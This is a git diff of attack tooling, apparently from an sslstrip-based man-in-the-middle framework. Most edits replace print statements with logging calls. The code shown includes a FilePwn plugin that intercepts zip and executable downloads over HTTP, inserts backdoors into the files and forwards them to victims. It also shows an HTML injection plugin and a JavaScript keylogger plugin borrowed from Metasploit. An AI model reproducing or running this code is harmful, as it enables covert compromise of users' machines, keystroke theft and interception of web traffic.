diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 6f6314e..a106385 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -25,7 +25,6 @@ class FilePwn(Plugin): optname = "filepwn" implements = ["handleResponse"] has_opts = False - log_level = logging.DEBUG desc = "Backdoor executables being sent over http using bdfactory" def convert_to_Bool(self, aString): @@ -160,17 +159,15 @@ class FilePwn(Plugin): return result except Exception as e: - print 'Exception', str(e) logging.warning("EXCEPTION IN binaryGrinder %s", str(e)) return None def zipGrinder(self, aZipFile): "When called will unpack and edit a Zip File and return a zip file" - print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB' + logging.info("ZipFile size: %s KB" % (len(aZipFile) / 1024)) if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): - print "[!] ZipFile over allowed size" logging.info("ZipFIle maxSize met %s", len(aZipFile)) return aZipFile @@ -194,20 +191,20 @@ class FilePwn(Plugin): logging.info('Encrypted zipfile found. Not patching.') return aZipFile - print "[*] ZipFile contents and info:" + logging.info("ZipFile contents and info:") for info in zippyfile.infolist(): - print "\t", info.filename, info.date_time, info.file_size + logging.info("\t%s %s %s" % (info.filename, info.date_time, info.file_size)) zippyfile.extractall(tmpDir) patchCount = 0 for info in zippyfile.infolist(): - print "[*] >>> Next file in zipfile:", info.filename + logging.info(">>> Next file in zipfile: %s" % info.filename) if os.path.isdir(tmpDir + '/' + info.filename) is True: - print info.filename, 'is a directory' + logging.info('%s is a directory' % info.filename) continue #Check against keywords keywordCheck = False @@ -223,8 +220,7 @@ class FilePwn(Plugin): continue if keywordCheck is True: - print "[!] Zip blacklist enforced!" - logging.info('Zip blacklist enforced on %s', info.filename) + logging.info('Zip blacklist enforced on %s' % info.filename) continue patchResult = self.binaryGrinder(tmpDir + '/' + info.filename) @@ -232,15 +228,12 @@ class FilePwn(Plugin): if patchResult: patchCount += 1 file2 = "backdoored/" + os.path.basename(info.filename) - print "[*] Patching complete, adding to zip file." shutil.copyfile(file2, tmpDir + '/' + info.filename) - logging.info("%s in zip patched, adding to zipfile", info.filename) + logging.info("%s in zip patched, adding to zipfile" % info.filename) else: - print "[!] Patching failed" - logging.info("%s patching failed. Keeping original file in zip.", info.filename) + logging.info("%s patching failed. Keeping original file in zip." % info.filename) - print '-' * 10 if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting. logging.info("Met Zip config patchCount limit.") @@ -250,12 +243,12 @@ class FilePwn(Plugin): zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED) - print "[*] Writing to zipfile:", tmpFile + logging.debug("Writing to zipfile: %s" % tmpFile) for base, dirs, files in os.walk(tmpDir): for afile in files: filename = os.path.join(base, afile) - print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '') + logging.debug('[*] Writing filename to zipfile: %s' % filename.replace(tmpDir + '/', '')) zipResult.write(filename, arcname=filename.replace(tmpDir + '/', '')) zipResult.close() @@ -273,12 +266,14 @@ class FilePwn(Plugin): content_header = request.client.headers['Content-Type'] if content_header in self.zipMimeTypes: - print "[+] Detected supported zip file type!" + logging.info("%s Detected supported zip file type!" % request.client.getClientIP()) bd_zip = self.zipGrinder(data) - return {'request':request,'data':bd_zip} + if bd_zip: + logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP()) + return {'request':request,'data':bd_zip} elif content_header in self.binaryMimeTypes: - print "[+] Detected supported binary type!" + logging.info("%s Detected supported binary type!" % request.client.getClientIP()) fd, tmpFile = mkstemp() with open(tmpFile, 'w') as f: f.write(data) @@ -288,9 +283,9 @@ class FilePwn(Plugin): if patchb: bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() os.remove('./backdoored/' + os.path.basename(tmpFile)) - print "[*] Patching complete, forwarding to user." + logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP()) return {'request':request,'data':bd_binary} else: - print "[-] File is not of supported Content-Type: %s" % content_header + logging.debug("%s File is not of supported Content-Type: %s" % (request.client.getClientIP(), content_header)) return {'request':request,'data':data} \ No newline at end of file diff --git a/plugins/Inject.py b/plugins/Inject.py index 82ce883..92203cf 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -8,7 +8,6 @@ class Inject(CacheKill,Plugin): optname = "inject" implements = ["handleResponse","handleHeader","connectionMade"] has_opts = True - log_level = logging.DEBUG desc = "Inject arbitrary content into HTML content" def initialize(self,options): @@ -33,7 +32,7 @@ class Inject(CacheKill,Plugin): self.dtable = {} self.count = 0 self.mime = "text/html" - print "[*] %s plugin online" % self.name + print "[*] Inject plugin online" def handleResponse(self,request,data): diff --git a/plugins/jskeylogger.py b/plugins/jskeylogger.py index ab8f3c6..c77c339 100644 --- a/plugins/jskeylogger.py +++ b/plugins/jskeylogger.py @@ -10,7 +10,7 @@ class jskeylogger(Inject, Plugin): def initialize(self,options): Inject.initialize(self, options) self.html_payload = self.msf_keylogger() - print "[*] %s online" % self.name + print "[*] %s plugin online" % self.name def msf_keylogger(self): #Stolen from the Metasploit module http_javascript_keylogger diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py index b185eed..03b6995 100644 --- a/sslstrip/ServerConnection.py +++ b/sslstrip/ServerConnection.py @@ -55,21 +55,19 @@ class ServerConnection(HTTPClient): t = line.split('=') dict[t[0]] = t[1] return dict - - def getLogLevel(self): - return logging.DEBUG def getPostPrefix(self): return "POST" def sendRequest(self): - logging.log(self.getLogLevel(), "%s Sending Request: %s %s%s" % (self.client.getClientIP(), self.command, self.headers['host'], self.uri)) + if self.command == 'GET': + logging.info("%s Sending Request: %s %s" % (self.client.getClientIP(), self.command, self.headers['host'])) self.plugins.hook() self.sendCommand(self.command, self.uri) def sendHeaders(self): for header, value in self.headers.items(): - #logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value)) + logging.debug("Sending header: %s : %s" % (header, value)) self.sendHeader(header, value) self.endHeaders() @@ -106,7 +104,7 @@ class ServerConnection(HTTPClient): self.transport.write(self.postData) def connectionMade(self): - #logging.log(self.getLogLevel(), "HTTP connection made.") + logging.debug("HTTP connection made.") self.plugins.hook() self.sendRequest() self.sendHeaders() @@ -115,7 +113,7 @@ class ServerConnection(HTTPClient): self.sendPostData() def handleStatus(self, version, code, message): - #logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message)) + logging.debug("Got server response: %s %s %s" % (version, code, message)) self.client.setResponseCode(int(code), message) def handleHeader(self, key, value): @@ -166,7 +164,7 @@ class ServerConnection(HTTPClient): logging.debug("Decompressing content...") data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() - #logging.log(self.getLogLevel(), "Read from server:\n" + data) + logging.debug("Read from server:\n" + data) data = self.replaceSecureLinks(data)